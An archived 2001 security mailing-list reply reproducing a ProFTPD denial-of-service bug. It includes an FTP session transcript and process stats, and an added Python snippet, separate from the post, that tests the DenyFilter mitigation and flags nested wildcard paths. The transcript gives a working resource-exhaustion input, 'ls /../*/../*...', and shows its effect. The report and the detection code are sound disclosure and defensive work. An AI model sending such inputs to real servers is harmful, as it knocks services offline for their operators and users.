Re: Multiple-Vendor-FTP-Vuln. (old?)

From: Michael Faurot (mfaurotat_private)
Date: Mon Aug 20 2001 - 20:54:43 PDT


    Michael Bellears <michael.bellearsat_private> wrote:
    : Couldn't reproduce on Debian 2.2....
    
    : isp-server-03:/# proftpd -v
    :  - ProFTPD Version 1.2.0pre10
    
    Debian 2.2 and the same version of ProFTPD here.
    
    According to dpkg:
    
    dpkg -s proftpd | grep ^Version
    Version: 1.2.0pre10-2.0potato1
    
    
    The client side of the ftp session, that initiates the problem:
    ------------------------------------------------------------------------------
    
    Script started on Mon Aug 20 18:15:49 2001
    $ ftp ftp.mydomain.com
    Connected to web.mydomain.com.
    220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com]
    Name (ftp.mydomain.com:mfaurot):
    331 Password required for mfaurot.
    Password:
    230 User mfaurot logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    200 PORT command successful.
    150 Opening ASCII mode data connection for file list.
    Quit
    $ exit
    Script done on Mon Aug 20 18:18:22 2001
    ------------------------------------------------------------------------------
    
    After issuing the "ls" command the server seems to freeze after
    displaying "150 Opening ASCII mode data connection for file list."  It
    then becomes necessary to issue a Ctrl-\ to exit the ftp client.
    
    Now, on the server hosting ProFTPD, here's the relevant bit from "top"
    showing the proftpd process sucking all the available CPU and a lot of
    the RAM:
    ------------------------------------------------------------------------------
    
      6:18pm  up 5 days,  3:02,  2 users,  load average: 0.28, 0.06, 0.02
    45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped
    CPU states:  0.6% user,  0.1% system,  0.2% nice,  1.9% idle
    Mem:  255984K av, 184876K used,  71108K free,      0K shrd,   2464K buff
    Swap: 248968K av,  26260K used, 222708K free                 19400K cached
     
      PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
    27556 mfaurot   20   0 76884  75M   952 R       0 96.4 30.0   0:21 proftpd
    27561 mfaurot   12   0  1476 1476   740 R       0  2.8  0.5   0:00 top
        1 root       8   0   132   84    60 S       0  0.0  0.0   0:03 init
        2 root       9   0     0    0     0 SW      0  0.0  0.0   0:00 keventd
    
    ------------------------------------------------------------------------------
    
    NOTE:  The configuration option "DenyFilter \*.*/" has not been applied
    to this system.  While that might well resolve the issue for me, 
    that's not going to fix the problem for the next person that is
    unaware of the bug.  
    
    In discussing this situation with Robert van der Meulen, I note that
    this only happens when one logs in with a regular user id and
    password, but it doesn't happen when doing an anonymous login.
    
    -- 
    ------------------------------------------------------------------------------
     Michael | mfaurot  | We're all just basically monkeys with car keys.
     Faurot  | atww.org | 
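
Added example, not part of the original post and not ProFTPD code: a check of what the DenyFilter value quoted above would and would not reject, next to a count of wildcard path segments that separates the nested pattern from ordinary globs. It assumes the filter is applied with search semantics to the command argument; MAX_WILDCARD_SEGMENTS and the sample arguments are constructed for illustration.

```python
import re

# The DenyFilter value quoted in the post, as a Python regex. Assumption:
# the server tests it with search semantics against the command argument.
DENY_FILTER = re.compile(r"\*.*/")

# Hypothetical threshold for the added heuristic below; not a ProFTPD setting.
MAX_WILDCARD_SEGMENTS = 2


def deny_filter_rejects(argument: str) -> bool:
    """True when the argument has a '*' followed anywhere later by a '/'."""
    return DENY_FILTER.search(argument) is not None


def wildcard_segments(argument: str) -> int:
    """Count path segments containing a glob metacharacter (*, ?, [)."""
    return sum(1 for seg in argument.split("/") if re.search(r"[*?\[]", seg))


def classify(argument: str) -> str:
    """Label an FTP LIST/NLST argument for review."""
    if wildcard_segments(argument) > MAX_WILDCARD_SEGMENTS:
        return "nested-glob"          # same shape as the argument in the post
    if deny_filter_rejects(argument):
        return "denyfilter-only"      # rejected by the filter, but a shallow glob
    return "ok"


# Constructed sample arguments; the first has the same shape as the one in the post.
SAMPLES = [
    "/../*" * 13,
    "*.txt",
    "pub/*.tar.gz",
    "pub*/README",
    "/home/mfaurot/docs",
]

if __name__ == "__main__":
    for arg in SAMPLES:
        shown = arg if len(arg) <= 30 else arg[:27] + "..."
        print(f"{classify(arg):16} deny={deny_filter_rejects(arg)!s:5} {shown}")
```

The "denyfilter-only" row shows the side effect of the filter: a single-level glob on a directory name is rejected along with the nested pattern.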
    



    This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 21:10:34 PDT